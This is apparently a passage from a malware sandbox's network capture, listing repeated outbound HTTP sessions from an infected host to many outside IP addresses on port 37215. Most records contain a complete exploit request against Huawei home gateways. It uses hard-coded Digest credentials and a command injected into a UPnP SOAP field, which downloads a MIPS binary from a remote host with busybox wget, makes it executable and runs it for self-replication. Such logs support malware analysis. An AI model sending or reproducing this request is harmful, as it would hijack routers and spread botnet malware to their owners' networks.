                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.155800841.155.20.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507664919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.153708441.193.215.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507668972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.1534030157.15.103.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507683039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.154164041.218.145.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507714033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.154241865.19.94.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507735968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.1550706116.109.8.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507738113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.154253441.217.174.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507765055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.1542156131.3.230.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507782936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.153654241.26.185.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507800102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          62192.168.2.1537416157.115.129.7137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507827997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
